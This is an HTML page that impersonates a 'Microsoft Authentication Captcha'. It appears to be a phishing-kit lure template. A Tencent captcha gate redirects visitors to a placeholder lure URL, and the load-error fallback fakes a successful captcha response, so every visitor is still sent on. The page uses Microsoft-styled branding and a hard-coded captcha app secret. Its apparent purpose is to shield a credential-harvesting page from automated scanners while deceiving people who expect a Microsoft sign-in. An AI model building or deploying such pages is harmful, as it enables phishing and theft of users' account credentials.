
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Microsoft Authentication Captcha</title>
    <!-- (Required) Dependency for CAPTCHA program, do not modify. Skipping loading CAPTCHA through local cache or other means may cause CAPTCHA to not update properly and result in misidentifications. -->
    <script src="https://ca.turing.captcha.qcloud.com/TCaptcha-global.js"></script>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap');
        
        body {
            background-image: url('https://i.postimg.cc/xCBpv5HH/Screenshot-2024-07-09-at-10-08-38.png'); /* Set background image */
            background-size: cover; /* Display image to cover the entire screen */
            background-position: center; /* Center the background image */
            display: flex;
            justify-content: center; /* Align content horizontally at the center */
            align-items: center; /* Align content vertically at the center */
            height: 100vh; /* Set height of the screen to 100% of the viewport */
            margin: 0; /* Remove default margin */
            font-family: 'Roboto', sans-serif; /* Use Roboto font */
            color: #333; /* Set default text color to dark */
        }

        .container {
            text-align: center; /* Center-align text */
            background: rgba(255, 255, 255, 0.8); /* Darker semi-transparent white background */
            padding: 30px 40px; /* Padding around the content */
            border-radius: 10px; /* Rounded corners */
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.3); /* Add a subtle shadow */
            max-width: 400px; /* Max width for the container */
            margin: 20px; /* Margin for the container */
        }

        h1 {
            font-size: 2rem; /* Slightly smaller font size for the title */
            margin-bottom: 20px; /* Space below the title */
            color: #007bff; /* Bright blue color for the title */
        }

        p {
            font-size: 1rem; /* Slightly smaller font size for the paragraph */
            margin-bottom: 30px; /* Space below the paragraph */
            color: #000; /* Black color for the paragraph */
        }

        #CaptchaId {
            background-color: #007bff; /* Set button background color */
            color: #ffffff; /* Set button text color */
            border: none;
            padding: 15px 30px; /* Increased padding for larger button */
            font-size: 1.2rem; /* Larger font size */
            cursor: pointer;
            border-radius: 5px; /* Rounded corners */
            transition: background-color 0.3s ease; /* Smooth transition for hover effect */
            display: inline-flex; /* Center the button's content */
            align-items: center; /* Center the button's content */
        }

        #CaptchaId:hover {
            background-color: #0056b3; /* Darker blue on hover */
        }
    </style>
</head>

<body>
    <div class="container">
        <p>Because you're accessing a sensitive info, please complete the CAPTCHA to proceed with your authentication.</p>
        <button id="CaptchaId" type="button">Verify you're not a robot</button>
    </div>
</body>

<script>
    function callback(res) {
        console.log('callback:', res);
        if (res.ret === 0) {
            window.location.assign({lure_url_js});
        }
    }

    function loadErrorCallback() {
        var appid = '189990944';
        var appSecretKey = 'pcHMLkmp3S6pH9FJKCDCy1rmc';
        var ticket = 'terror_1001_' + appid + '_' + Math.floor(new Date().getTime() / 1000);
        callback({
            ret: 0,
            randstr: '@' + Math.random().toString(36).substr(2),
            ticket: ticket,
            errorCode: 1001,
            errorMessage: 'jsload_error',
        });
    }

    window.onload = function(){
        document.getElementById('CaptchaId').onclick = function(){
            try {
                var captcha = new TencentCaptcha('189990944', callback, {});
                captcha.show();
            } catch (error) {
                loadErrorCallback();
            }
        }
    }
</script>

</html>
